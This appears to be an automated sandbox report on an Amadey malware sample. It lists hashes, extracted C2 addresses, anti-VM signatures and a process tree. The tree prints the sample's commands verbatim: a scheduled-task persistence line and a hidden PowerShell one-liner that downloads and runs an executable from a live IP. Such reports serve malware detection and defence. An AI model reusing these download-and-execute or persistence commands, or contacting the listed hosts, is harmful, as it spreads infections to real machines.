Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
24/03/2025, 07:50
Static task
static1
Behavioral task
behavioral1
Sample
0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe
Resource
win10v2004-20250314-en
General
-
Target
0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe
-
Size
938KB
-
MD5
3c9fe35d228454d41a439411bb05736b
-
SHA1
6757675488a29b5031507d5924fa9fcc52c02f6d
-
SHA256
0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1
-
SHA512
8803b09c53533308e7d9dd8810136bece13335896c7a125b7a05ebd315bdb7151d7b81fbf167a7378f33ba97020668dd35fc406faee5ac6fc4959745b066e7fd
-
SSDEEP
24576:DqDEvCTbMWu7rQYlBQcBiT6rprG8a03u:DTvC/MTQYxsWR7a03
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Signatures
-
Amadey family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 4 2124 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2124 powershell.exe -
Downloads MZ/PE file 3 IoCs
flow pid Process 8 1676 rapes.exe 4 2124 powershell.exe 7 1676 rapes.exe -
Checks BIOS information in registry 2 TTPs 4 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Executes dropped EXE 4 IoCs
pid Process 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 1676 rapes.exe 1764 laf6w_001.exe 2860 9d0bc11efe.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE Key opened \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Wine rapes.exe -
Loads dropped DLL 9 IoCs
pid Process 2124 powershell.exe 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 1676 rapes.exe 1676 rapes.exe 1676 rapes.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe 3024 WerFault.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 1676 rapes.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Tasks\rapes.job TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language laf6w_001.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1796 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
pid Process 2124 powershell.exe 2124 powershell.exe 2124 powershell.exe 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 1676 rapes.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2124 powershell.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 2568 wrote to memory of 2536 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 30 PID 2568 wrote to memory of 2536 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 30 PID 2568 wrote to memory of 2536 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 30 PID 2568 wrote to memory of 2536 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 30 PID 2568 wrote to memory of 2348 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 32 PID 2568 wrote to memory of 2348 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 32 PID 2568 wrote to memory of 2348 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 32 PID 2568 wrote to memory of 2348 2568 0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe 32 PID 2536 wrote to memory of 1796 2536 cmd.exe 33 PID 2536 wrote to memory of 1796 2536 cmd.exe 33 PID 2536 wrote to memory of 1796 2536 cmd.exe 33 PID 2536 wrote to memory of 1796 2536 cmd.exe 33 PID 2348 wrote to memory of 2124 2348 mshta.exe 34 PID 2348 wrote to memory of 2124 2348 mshta.exe 34 PID 2348 wrote to memory of 2124 2348 mshta.exe 34 PID 2348 wrote to memory of 2124 2348 mshta.exe 34 PID 2124 wrote to memory of 2660 2124 powershell.exe 37 PID 2124 wrote to memory of 2660 2124 powershell.exe 37 PID 2124 wrote to memory of 2660 2124 powershell.exe 37 PID 2124 wrote to memory of 2660 2124 powershell.exe 37 PID 2660 wrote to memory of 1676 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 38 PID 2660 wrote to memory of 1676 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 38 PID 2660 wrote to memory of 1676 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 38 PID 2660 wrote to memory of 1676 2660 TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE 38 PID 1676 wrote to memory of 1764 1676 rapes.exe 40 PID 1676 wrote to memory of 1764 1676 rapes.exe 40 PID 1676 wrote to memory of 1764 1676 rapes.exe 40 PID 1676 wrote to memory of 1764 1676 rapes.exe 40 PID 1676 wrote to memory of 2860 1676 rapes.exe 41 PID 1676 wrote to memory of 2860 1676 rapes.exe 41 PID 1676 wrote to memory of 2860 1676 rapes.exe 41 PID 1676 wrote to memory of 2860 1676 rapes.exe 41 PID 2860 wrote to memory of 3024 2860 9d0bc11efe.exe 43 PID 2860 wrote to memory of 3024 2860 9d0bc11efe.exe 43 PID 2860 wrote to memory of 3024 2860 9d0bc11efe.exe 43
Processes
-
C:\Users\Admin\AppData\Local\Temp\0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe"C:\Users\Admin\AppData\Local\Temp\0e4c2d84c6184bb07a420c60fa527fa1fa484a080e92bddd59d3737d47a23af1.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2568 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 5O4MDmacKLI /tr "mshta C:\Users\Admin\AppData\Local\Temp\SDTQMVmH7.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2536 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 5O4MDmacKLI /tr "mshta C:\Users\Admin\AppData\Local\Temp\SDTQMVmH7.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1796
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\SDTQMVmH7.hta2⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2348 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'TZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2124 -
C:\Users\Admin\AppData\Local\TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE"C:\Users\Admin\AppData\Local\TempTZUB5XXUGOCQSZMNR9FEFI1MOEJSAQ2O.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:2660 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\10318590101\laf6w_001.exe"C:\Users\Admin\AppData\Local\Temp\10318590101\laf6w_001.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1764
-
-
C:\Users\Admin\AppData\Local\Temp\10318600101\9d0bc11efe.exe"C:\Users\Admin\AppData\Local\Temp\10318600101\9d0bc11efe.exe"6⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2860 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2860 -s 367⤵
- Loads dropped DLL
PID:3024
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.2MB
MD5d6ea7e3f4fe6ed3f10591b5d2cfa330e
SHA1a8e4168f3bb2586af3c3b48f24401cfe5e828b53
SHA25694ea263e7adea5df392a68dd41332d718e88c0afec14ee98ebf91fc2f42c586d
SHA512225c07356c88a91d2ba4d32dd55da945fd06f0971885d7d6801fe8d27d85303926425c6fc9dda4877d6050c48c2dd5109d9d6e88d107df72f88b89a29ff61bc8
-
Filesize
1.1MB
MD5999c92338f2c92dd095a74f0581fe012
SHA162d53a745cc4d83a0d00a865cf7f2ec28fb84b1b
SHA256b28e8a5c04dbfcbf462014aedc83bafec26d0eedebefca620b740df26cb09700
SHA512a94b4ba0c4677d0ac231f0047a1eb7556bf7b36b7bcda896782711ff3bb52800ab26f28fe36ef2d445dce3134d5ce8c024466451dd1e58842b5ebbe7e35a70e3
-
Filesize
717B
MD59f5ba6be30c500f4d27d814b4c3fd2ca
SHA16afa1749d5e5f685edf9f8b9cc06e83b542f8f97
SHA2567fee275b2c1aedff826763b4e8d7b43832422066276476f5b35dab7bd8282f64
SHA512cf7c1ee495427610eb2272632481765b80c2de6491b050ecff3bc8584f51cba2170abac050b37cc677e9cda658509e05145cb67f7159fad62af555a3eb8f80e0
-
Filesize
1.8MB
MD5780ba8922dbecc4484b5af39f4ea0729
SHA1a2b78ec0cad2888a1d90055ed606b835dc516292
SHA2567f667b98ed04aa91b7b32eed82a4524f4fc8b91fbdc20086947754c9c4a0ecac
SHA5122a31994c89ceeb6809f3247e2e56785ba6f9515627e220df39e9f9d77409d459b4bdd13026ae75ca7296c9f858dbbe5d704da83c0d3b9abda1e46e1b65f9c112